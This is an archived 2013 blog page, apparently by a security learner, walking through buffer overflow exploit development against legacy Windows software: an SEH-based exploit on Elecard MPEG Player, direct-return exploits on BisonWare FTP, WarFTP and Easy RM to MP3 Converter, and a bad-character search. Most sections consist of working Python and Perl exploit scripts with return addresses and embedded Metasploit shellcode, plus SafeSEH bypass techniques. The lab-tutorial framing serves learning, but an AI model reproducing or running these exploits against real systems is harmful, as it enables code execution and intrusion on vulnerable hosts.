codename scx030c06c: April 2013

Wednesday, 24 April 2013

Buffer Overflow : SEH based exploit on Elecard MPEG Player

in this post i will write my steps to exploit media player application (Elecard MPEG Player) with SEH protection, and here's the steps :

1. install application in windows XP machine

2. do the information gathering about supported filetype

3. From IG i got the information : the target support .m3u file and need a header

4. create the fuzzer file with python
file="seh.m3u"
junk="#EXTM3U\n"
junk+="\x41"*15000
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

5. compile fuzzer to generate the m3u file

6. run target and load the m3u fuzzer

7. the target is crashed

8. now open the target with ollyDbg to to see what actually happened

9. run target and load the m3u fuzzer

10. the target is crashed. look at the top left box, the EBP and ESI is overwritten, but the EIP is not. it's because the SEH handle the crash

11. to see the SEH go to view > SEH chain. press shift+F9 to bypass the fuzzer to EIP

12. next step is create pattern with metasploit and insert into fuzzer script

13. run target from ollyDbg and load the m3u fuzzer

14. look the address in SEH chain and find the offset using metasploit

15. the offset is 8, that means need 8 byte to go to SEH

16. change the fuzzer script to measure the exact address of SEH
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*8
junk+="\xEF\xBE\xAD\xDE"
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

17. okay, the SEH address is pwned.

18. next step is find the module that has POP POP RETN command but doesn't have SafeSEH protection

19. i will try to use esrcnet.dll module

20. now search sequence command of POP POP RETN in D3DIM7300 module

21. modify the fuzzer script
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73" #POP ESI address
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

21. generate the payload with msfweb, in this case i use command call calculator

22. insert the payload into the fuzzer script and compile it
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4
junk+="\xeb\x06\x90\x90" #jump short
junk+="\xA6\xA0\x94\x73"
junk+="\x90"*16
junk+=("\xbb\x10\xbf\xd7\x63\x29\xc9\xda\xc4\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x31\x5a\x10\x83\xc2\x04\x03\x4a\xb3\x35\x96\x96\x23\xfd\x59\x66"
"\xb4\x75\x1c\x5a\x3f\xf5\x9a\xda\x3e\xe9\x2e\x55\x59\x7e\x6f\x49"
"\x58\x6b\xd9\x02\x6e\xe0\xdb\xfa\xbe\x36\x42\xae\x45\x76\x01\xa9"
"\x84\xbd\xe7\xb4\xc4\xa9\x0c\x8d\x9c\x09\xe9\x84\xf9\xd9\xae\x42"
"\x03\x35\x36\x01\x0f\x82\x3c\x4a\x0c\x15\xa8\xff\x30\x9e\x2f\x14"
"\xc1\xfc\x0b\xee\x11\xcd\x93\x8a\x1e\x6e\x24\xd7\xe1\x17\x48\x5c"
"\xa1\xeb\xdb\x12\x3e\x59\x50\xba\x36\x4a\x6e\xb1\xc7\x3c\x71\xc5"
"\xc7\xb7\x1a\xf9\x98\xf6\x2c\x61\x71\x70\x28\xe2\xbd\xf9\x99\x8c"
"\x43\x26\xfb\x3f\xd4\x4e\x02\x35\x2a\x38\x04\xae\x50\xa7\x96\x53"
"\x97")
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()

23. run the target without ollyDbg and insert the m3u fuzzer and see what happened

24. voila! the target is pwned!

Introducing SEH

SEH (Structured Exception Handling) is the protection integrated on a system of a software to handle the abnormal flow of the program that can caused the program to act abnormal too (crash, hang, etc). SEH will prevent the EIP to be overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software. This protection definitely forcing hackers to develop a technique to bypass the SEH protection. When this protection can be controlled, the execution process on the CPU also can be controlled easily like in the Direct Return Exploitation.

The most popular technique to bypass this protection is using the POP, POP, RETN technique. Basically stack in the memory is a structured memory consist of 32 bit virtual file. The first POP command will take out the topmost value layer of the virtual file to the other register on the memory. And the second POP command will take out the second layer of the stack on the memory. Finally the third command, RETN will be the first layer on the stack, so the system will start the execution process from that location depend on the memory address pointed by the RETN command.

When the technique above is done smoothly, the control of the process in the CPU is in our hand and can be manipulated as we wish. The problem now is, Windows have one more protection to prevent the SEH to be manipulated by the POP, POP, RETN technique called "SafeSEH".

In windows XP SP2 and Windows Server 2003, there is a new technology to protect the SEH to be bypassed called SafeSEH. Generally, SafeSEH is only a linker that can be used at the compilation process of a program/software in Windows system. When the SafeSEH is used, the application will generate a table that contain all memory address that will be used by itself and also save the addresses of the SEH on the modules used. This means, when an exploitation that utilize the POP POP RETN command happen, the address that used to bring the SEH to the POP POP RETN address wont work because the address is not recorded in the table generated by the SafeSEH and the exploitation will failed.

In addition to the SafeSEH protection, windows xp also have another protection against the exploitation that can be integrated into its dll files. This feature called "IMAGE_DLLCHARACTERISTICS_NO_SEH". If a dll file use that feature, it will prevent the use of any address inside itself to be used as the command to bypass the SEH.

There are some technique to bypass that protection :
1. Using modules or files that don't have SafeSEH and IMAGE_DLLCHARACTERISTICS_NO_SEH features integrated. Usually third party application library doesn't compilated with that two disturbing features.
2. Use the library that will be used to overwrite SEH from outside the application that have POP POP RETN command inside.
3. Use memory address outside HEAP memory.
4. Use an integrated handler memory that already registered.

Reference : http://scx010c075.blogspot.com/2012/02/more-about-seh-and-safeseh.html#ixzz2RMO4MdQj

Buffer overflow : direct return exploit BisonWare FTP Server V3.5

1. open application bisonWare FTP

2. test connection with nc

3. create fuzzer script with python

import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*100
buffer+= "\r\n"
s.connect(('192.168.56.101',21))
print "Connecting...."
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."

4. test sending fuzzer, start with *100, *200, *300, until target crash

5. target crash in *1600

6. open target from OllyDbg to begin debugging

7. try sending fuzzer again

8. look the EIP, it contains character 41414141 from fuzzer

9. create pattern and insert into fuzzer script

10. open target with OllyDbg and send fuzzer again

11. copy EIP register and find offset with pattern_offset.rb

12. edit the script to determine EIP location
buffer+="BBBB"
13. open target with OllyDbg and send fuzzer again

14. now EIP is under control

different from previous target, in this target i'm not using ESP register to put payload, i will use EBX. why? because the EBX is overflowed with fuzzer data while ESP is not. right click the ESP > follow in dump. there are big enough space to put payload.

15. find JUMP ESP command and copy the address into fuzzer script
buffer+="\x0B\xFD\xA6\x7C"

16. add breakpoint to the address of JMP EBX

17. open target with OllyDbg and send fuzzer again

18. EIP address is successfully overwritten by JMP EBX address

19. now generate the payload with msfweb, choose windows execute command > calc

20. copy payload script to the fuzzer script

import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
payload=("\xda\xdf\x33\xc9\xbf\xa0\xf7\x50\x16\xb1\x23\xd9\x74\x24\xf4\x5b"
"\x31\x7b\x17\x03\x7b\x17\x83\x63\xf3\xb2\xe3\x9f\x14\x76\x0c\x5f"
"\xe5\xfc\x49\x63\x6e\x7e\x57\xe3\x71\x90\xdc\x5c\x6a\xe5\xbc\x42"
"\x8b\x12\x0b\x09\xbf\x6f\x8d\xe3\xf1\xaf\x17\x57\x75\xef\x5c\xa0"
"\xb7\x3a\x91\xaf\xf5\x50\x5e\x94\xad\x82\x9b\x9f\xa8\x40\xfc\x7b"
"\x32\xbc\x65\x08\x38\x09\xe1\x51\x5d\x8c\x1e\xe6\x41\x05\xe1\x13"
"\xf0\x45\xc6\xe7\xc0\x47\xc6\x83\x4d\xe7\xf6\xce\x92\x90\xfa\x5b"
"\x52\x6d\x88\x2b\x4f\xc0\x05\xa3\x67\xf1\x13\xb8\xf8\xb5\x24\xbe"
"\xf8\x3e\x4c\x82\xa7\x71\x7b\x9a\x01\xfb\x7b\xd9\x6e\x80\x2b\xb5"
"\x10\xaf\x2e\x36\x85\xd7\x51\x32\x5b\xbf\x52\xa5\x07\x5e\xc1\x4a"
"\xc8")
buffer = "\x41"*1191 + "\x0B\xFD\xA6\x7C" + "\x90"*90 + payload+'\r\n'
print "Connecting...."
s.connect(('192.168.56.101',21))
data = s.recv(1024)
time.sleep(3)
print "Sending Payload..."
data = s.recv(2000)
s.send('USER anonymous\r\n')
data = s.recv(2000)
s.send('PASS anonymous\r\n')
data = s.recv(2000)
s.send('ABOR ' + buffer +'\r\n')
s.close()
print "Finished..."

21. open target without OllyDbg and send fuzzer again

22. Voila! the target has been exploited!

Buffer overflow : find bad characters

Bad character is the characters that will make a payload failed to run because in register they change into a random character (usually become byte 20)

now I will try to find bad characters in WarFTP application

1 run OllyDbg and attach WarFTP application

2 generate a byte characters with generatecode.pl script

3 create a fuzzer script with python

import socket

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

buffer = "\x90"*485

buffer+= "\xEF\xBE\xAD\xDE"

buffer+= "\x90" * (493-len(buffer))

buffer+= #insert generated characters here

buffer+= "\xCC" * (1000-len(buffer))

s . connect (('192.168.56.101',21))

data = s.recv(1024)

print ("Sending evil data via USER command...")

s.send('USER '+buffer+'\r\n')

data = s.recv(1024)

s.send('PASS '+'\r\n')

s.close()

print("Finish")

4 insert byte characters line per line to the script (without bad characters). Default bad character is \x00

5 right click ESP > follow in dump

6 look for an abnormal character (appear as byte 20)

7 delete the abnormal character from the fuzzer script

8 go back to step 4 and do it until there's no more bad characters are found

- found anomaly in \x0a

- found anomaly in \x0d

- found anomaly in \x40 (target is not crash)

so far the bad characters found : \x00 \x0a \x0d \x40

9 insert all characters to fuzzer script excluding the bad character found, here's the result :

10 there's no more bad character

Buffer overflow : direct return exploit warFTP application

Open and start warFTP application

test connection to warFTP

nc 192.168.56.101 21

Create fuzzer script with python :

import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*1000
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")

send fuzzer to target and see the target crash or not.

Python fuzzftp.py

the target is crash, it means that the target is vulnerable with buffer overflow

open warftp from OllyDbg to start debugging. send the fuzzer again and see what happened.

EIP is overwritten with character A. now replace the A character in fuzzer code with pattern from metasploit pattern_create

open and start again warftp from OllyDbg and send fuzzer again. See what happened.

EIP is overwritten by the pattern created before.

Find pattern offset EIP and ESP with metasploit pattern_offset

./pattern_offset.rb 32714131

The result for EIP is 485.

./pattern_offset.rb q4Aq5Aq

The result for ESP is 493

edit the script and insert EIP and ESP information

import socket

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

buffer = "\x90"*485

buffer += "\xLE\xHO\xRM\xWO"

buffer += "\x90"*(493-len(buffer))

buffer += "\xCC"*(1000-len(buffer))

s . connect (('192.168.56.101',21))

data = s.recv(1024)

print ("Sendingevildatavia USER command...")

s.send('USER '+buffer+'\r\n')

data = s.recv(1024)

s.send('PASS '+'\r\n')

s.close()

print("Finish")

send fuzzer into the target. See the result. Now the EIP and ESP is under controlled.

Next find the JMP ESP command from shell32.dll module with OllyDbg.

Copy the location and insert into the fuzzer script

import socket

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

buffer = "\x90"*485

buffer += "\x65\x82\xA5\x7C"

buffer += "\xCC"*(493-len(buffer))

buffer += "\xCC"*(1000-len(buffer))

s . connect (('192.168.56.101',21))

data = s.recv(1024)

print ("Sendingevildatavia USER command...")

s.send('USER '+buffer+'\r\n')

data = s.recv(1024)

s.send('PASS '+'\r\n')

s.close()

print("Finish")

test the new fuzzer and look the value of EIP

generate the payload from metasploit msfweb and insert into fuzzer script. In this case I will use Bind Shell

send the fuzzer again and try to telnet target. test with telnet to the target, if successful the terminal should be like this :

Buffer overflow : direct return exploit

A buffer overflow occurs when more data are written to a buffer than it can hold. The excess data is written to the adjacent memory, overwriting the contents of that location and causing unpredictable results in a program. Buffer overflows happen when there is inproper validation (no bounds prior to the data being written. It is considered a bug or vulnerabilities in the software. Buffer overflow can be used to exploit the software to gain an access to the systems.

The are two methods to do buffer overflow to system's memory, the direct return exploit and SEH based exploit.

Direct return exploit is the process to overflow buffer memory and overwritten the EIP register so the system crash and can be exploited.

SEH based exploit is using SEH(Structured Exception Handling) to handle the exception. When the system is overflow by certain data, the SEH will handle the overflow so the memory 's register location can't be read and can't be exploitted directly.

And in this post I will write about the first method, the direct return exploit. The software that will be used as a sample is “easy RM to MP3 Converter” installed on my lab. The tools that I use :

backtrack 5
metasploit framework
lab (Windows XP SP 2 in virtualBox)
fuzzer data in perl
easy RM to MP3 converter application
OllyDbg application

here's the steps :

1. run windows XP in VirtualBox

2. install and run easy RM to MP3 converter that will be used as a target.

3. send the fuzzer to find the vulnerabilities of target. Fuzzer is data contains large amount of character can can cause the system crash.

4. Create a fuzzer in perl and compile as an audio file. I named it song.m3u

my $file= "song.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;close($FILE);
print "m3u File Created successfully\n";

5. load a fuzzer at the target

6. if the target is not crash, increase the character number in fuzzer program. If the target crash means
that the target is vulnerable and can be exploitted.

7. Open the ollyDbg to know what can cause the target crash

8. attach and run application target to the ollyDbg

9. again, load fuzzer to the target, and the target will crash

10. look in top right in OllyDbg in EIP register content. The EIP contain 42424242, and ESP contain
BBBBBBB, byte from fuzzer file. it means that the EIP has been overwritten by the fuzzer

11. to know the byte position of the EIP, edit the fuzzer file. replace the 5000 x B with pattern created from metasploit pattern_create.rb

./pattern_create 5000

12. copy the pattern to fuzzer code and compile and load again at target. Look at EIP register content. The content is 366B4235.

To know the position of the pattern use the pattern_offset.rb from metasploit

./pattern_offset.rb 366B4235

the offset is 1097. it means that the EIP start from 25000+1097 from the fuzzer byte. now edit the fuzzer again and now looks like this :

my $file= "song.m3u";my $junk = "\x41" x 26097;
my $eip = "BBBB";
my $esp = "\x43" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$esp;
close($FILE);
print "m3u File Created successfully\n";

compile and load at the target from ollyDbg. Now the EIP is contain BBBB and ESP contain CCCCCCCCCC.

It means that the location of EIP is known, and now I will try to find the first location of ESP.

13. edit the fuzzer again with the following code :

my $file= "song.m3u";
my $junk = "\x41" x 26097;
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" . "5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);

print "m3u File Created successfully\n";

14. compile and load at the target. Look at ESP register. ESP register contain byte from DEFGHIJ..., not from 1ABCDE...

it means there are 4 byte space between EIP and ESP.

15. now edit again the fuzzer with the following code :

my $file= "song.m3u";
my $junk = "\x41" x 26097;
my $eip = "BBBB";
my $space = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" . "5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$space.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

16. compile and load again to the target. Now the ESP is start from the 1ABCDEF.... and the ESP starting address is 000FF73. This address will be used to points to the payloads.

17. now edit the fuzzer again and build a shellcode with the following code :

my $file= "song.m3u";
my $junk = "\x41" x 26097;
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

18. run the application and load the fuzzer. Now the EIP address is same as ESP address, it means that the EIP get the address from ESP.

19. the next step is find the command called JMP ESP to put into EIP register. So when application first run will go into EIP, and then EIP will jump into ESP, and in ESP the payload is already to be executed.

20. how to find JMP ESP? First open the application with OllyDbg. In menu view > executable modul and double click in shell32.dll module.

Right click in command lists and choose search for > command and type JMP ESP.

then I get the address of the JMP ESP command. The address is 7ca58265

21. now the information is completed and ready to put the payload. Generate the payload using metasploit msfweb (/pentest/exploits/framework2/msfweb). Open the web browser and type 127.0.0.1:55555 to access the msfweb. Choose menu payloads > windows execute command. Fill in the form like picture below and click generate payload. in this case i will call calcuator via command line :

21. copy the payload code to the fuzzer file. Now the code looks like :

my $file= "song.m3u";
my $junk = "\x41" x 26097;
my $eip = pack('V',0x7ca58265);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode. "\x31\xc9\xda\xcf\xd9\x74\x24\xf4\xbb\x59\x1d\x52\xd1\xb1\x23\x5f". "\x83\xef\xfc\x31\x5f\x11\x03\x06\x0c\xb0\x24\x44\xc6\x70\xc7\xb4". "\x17\xf2\x82\x88\x9c\x78\x08\x88\xa3\x6f\x99\x27\xbc\xe4\xc1\x97". "\xbd\x11\xb4\x5c\x89\x6e\x46\x8c\xc3\xb0\xd0\xfc\xa0\xf1\x97\xfb". "\x69\x3b\x5a\x02\xa8\x57\x91\x3f\x78\x8c\x5e\x4a\x65\x47\x01\x90". "\x64\xb3\xd8\x53\x6a\x08\xae\x3c\x6f\x8f\x5b\x49\x93\x04\x9a\xa6". "\x25\x46\xb9\x3c\xf5\x46\x01\x58\x72\xe8\xb1\x25\x44\x91\xbd\xae". "\x05\x6e\x35\xc0\x99\xc3\xc2\x48\xaa\xf0\xdc\x03\x2a\xb6\xdf\x13". "\x2b\x3c\xb7\x2f\x74\x73\xbe\x2f\xdc\xfa\xc6\x2c\x20\x87\x66\x5a". "\xdf\xa0\x65\xe9\x77\xc9\x94\x87\x86\xbe\x97\x70\xf5\x21\x04\x1d".
"\xfa"; open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";